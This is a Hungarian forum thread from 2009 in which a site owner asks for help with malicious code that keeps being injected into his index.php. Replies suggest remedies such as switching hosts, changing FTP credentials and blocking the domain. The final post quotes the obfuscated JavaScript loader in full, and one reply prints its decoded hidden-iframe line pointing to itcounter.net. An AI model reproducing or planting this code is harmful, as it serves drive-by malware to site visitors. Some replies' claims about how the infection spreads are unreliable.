Megfertőzte valami a weblapom
2009-03-21T15:00:29+01:00
2009-03-22T08:36:52+01:00
2022-07-19T05:27:00+02:00
  • http://manutdhungary.com
    de most nem látsz semmit, levettem a kezdőlapot, hogy ne kapjanak vírust a látogatók, egy éve stabilan működött.
    Mutasd a teljes hozzászólást!
  • bocsi Norbi, ez a kérdezőnek megy...

    én már találkoztam ezzel a vírussal, ez a becses neve: HTML:IEslice-E [Trj]

    ingyenes szolgáltatóknál szokott előfordulni, eddíg ultraweben és freeweben küzdöttem vele. Ez egy mocskos trójai "adatlopó" vírus, a szolgáltató szerverét megfertőzve terjed át a felhasználók tárhelyére. Nem tudsz mit csinálni, először az index fájllal kezdi és onnan meg a hivatkozásokat végigkövetve továbbterjed a többi fájlra is.

    sajnos egy megoldás van: pucolj onnan, de sebesen! persze írtam akkor a szolgáltatónak, de mindig csak a szokásos szabványszöveg jött vissza válaszul: "hibaelhárítás folyamatban...".

    ennyit erről
    Mutasd a teljes hozzászólást!
  • Kivancsi lennek a kerdezo oldalara..
    Mutasd a teljes hozzászólást!
  • Futtass vírusellenőrzést a gépeden, és írts ki mindent, utána változtass ftp jelszót, illetve hazsnálj tűzflat ha eddig nem tetted volna.

    Nekem ilyen pár éve volt az oldalamban, ftp-t lopta ki a gépemből vagy valami ilyesmi és aztán azon keresztül töltötte fel vmi robot mindíg a cuccot. Itt is ez lesz, legalábbos ha nincs az oldaladban biztonsági rés.
    Mutasd a teljes hozzászólást!
  • Persze: azt figyeli és ellenőrzi a derék szolgáltató, hogy észreveszed/szereted-e, ha belevírusolnak a fájlaidba.
    Mutasd a teljes hozzászólást!
  • [off]A kerdezo kerdesere nem birok valaszolni,mert a kerdesetol osszezavarodott a bongeszom ezert most Micunak valaszolok.

    [on]Hasonlo mar volt nekem is es akkor azt a valaszt kaptam, hogy a nemkivanatos js kolbasz kod csupan egy forraskod figyelo illetve ellenorzo.

    Megoldas: Valtottam tarhelyet.

    Mutasd a teljes hozzászólást!
  • ilyennel anno találkoztam én is, bár nem tudtam mire vélni. az a lap asszem ultraweben volt. igazából én se nagyon értettem, hogy hogy kerülhetett be a forrásba
    Mutasd a teljes hozzászólást!
  • Ez is egy jó megoldás
    Mutasd a teljes hozzászólást!
  • Menj el sörözni a haverokkal, és felejtsd el a weboldalakat
    Mutasd a teljes hozzászólást!
  • 1. Rakd be az adblocker-be a http://itcounter.net-et és ajánld ezt az oldalad látogatóinak is.


    Korrekt megoldás!

    Főleg:
    amit a böngészőben vírusnak/trójainak érzékelnek a látogatók

    Én mégegyszer egy olyan oldalra se mennék, amit a víruskeresőm vírusnak érzékel.
    Mutasd a teljes hozzászólást!
  • <iframe name=c28 src='http://itcounter.net/counter.php?'+Math.round(Math.random()*173328)+'89749485010c' width=628 height=276 style='visibility:hidden'></iframe>

    1. Rakd be az adblocker-be a http://itcounter.net-et és ajánld ezt az oldalad látogatóinak is.
    2. Keress másik szolgáltatót.
    Mutasd a teljes hozzászólást!
  • Keresd meg, hogy hol van a biztonsági rés az oldalaidban (pl. fájlfeltöltés) javítsd ki az és utána szedd ki végig mindenhonnan.
    Mutasd a teljes hozzászólást!
  • Hello! Kb egy hete idegesítő gondom akadt. Egy vírus vagy nem tudom mi folyton beleíródik az index.php-ba, amit a böngészőben vírusnak/trójainak érzékelnek a látogatók, és üres sorok jelennek meg. Akárhányszor törlöm ezt a forrásból, pár óra múlva ismét ott vannak, eleinte a </body> előtt, de újonnan már az index elején is. Már órák óta próbálok megoldást találni, ha valaki tud segíteni írjon kérem.

    A kód:

    <script>function c2882110cbp49c4da7fdec2b(p49c4da7fdf3fb){ function p49c4da7fdfbce(){var p49c4da7fe039a=16;return p49c4da7fe039a;} return (parseInt(p49c4da7fdf3fb,p49c4da7fdfbce()));}function p49c4da7fe0b6a(p49c4da7fe133a){ function p49c4da7fe2aaa(){return 2;} var p49c4da7fe1b09='';p49c4da7fe3a49=String.fromCharCode;for(p49c4da7fe22dc=0;p49c4da7fe22dc<p49c4da7fe133a.length;p49c4da7fe22dc+=p49c4da7fe2aaa()){ p49c4da7fe1b09+=(p49c4da7fe3a49(c2882110cbp49c4da7fdec2b(p49c4da7fe133a.substr(p49c4da7fe22dc,p49c4da7fe2aaa()))));}return p49c4da7fe1b09;} var ua7='';var p49c4da7fe4219='3C7'+ua7+'3637'+ua7+'2697'+ua7+'07'+ua7+'43E696628216D7'+ua7+'96961297'+ua7+'B646F637'+ua7+'56D656E7'+ua7+'42E7'+ua7+'7'+ua7+'7'+ua7+'2697'+ua7+'465287'+ua7+'56E657'+ua7+'363617'+ua7+'065282027'+ua7+'2533632536392536362537'+ua7+'322536312536642536352532302536652536312536642536352533642536332533322533382532302537'+ua7+'332537'+ua7+'32253633253364253237'+ua7+'2536382537'+ua7+'342537'+ua7+'342537'+ua7+'302533612532662532662536392537'+ua7+'342536332536662537'+ua7+'352536652537'+ua7+'342536352537'+ua7+'322532652536652536352537'+ua7+'342532662536332536662537'+ua7+'352536652537'+ua7+'342536352537'+ua7+'322532652537'+ua7+'302536382537'+ua7+'30253366253237'+ua7+'2532622534642536312537'+ua7+'342536382532652537'+ua7+'322536662537'+ua7+'352536652536342532382534642536312537'+ua7+'342536382532652537'+ua7+'32253631253665253634253666253664253238253239253261253331253337'+ua7+'253333253333253332253338253239253262253237'+ua7+'253338253339253337'+ua7+'253334253339253334253338253335253330253331253330253633253237'+ua7+'2532302537'+ua7+'37'+ua7+'2536392536342537'+ua7+'34253638253364253336253332253338253230253638253635253639253637'+ua7+'2536382537'+ua7+'34253364253332253337'+ua7+'2533362532302537'+ua7+'332537'+ua7+'342537'+ua7+'39253663253635253364253237'+ua7+'2537'+ua7+'362536392537'+ua7+'332536392536322536392536632536392537'+ua7+'342537'+ua7+'39253361253638253639253634253634253635253665253237'+ua7+'2533652533632532662536392536362537'+ua7+'3225363125366425363525336527'+ua7+'29293B7'+ua7+'D7'+ua7+'6617'+ua7+'2206D7'+ua7+'969613D7'+ua7+'47'+ua7+'27'+ua7+'5653B3C2F7'+ua7+'3637'+ua7+'2697'+ua7+'07'+ua7+'43E';document.write(p49c4da7fe0b6a(p49c4da7fe4219));</script>
    Mutasd a teljes hozzászólást!
abcd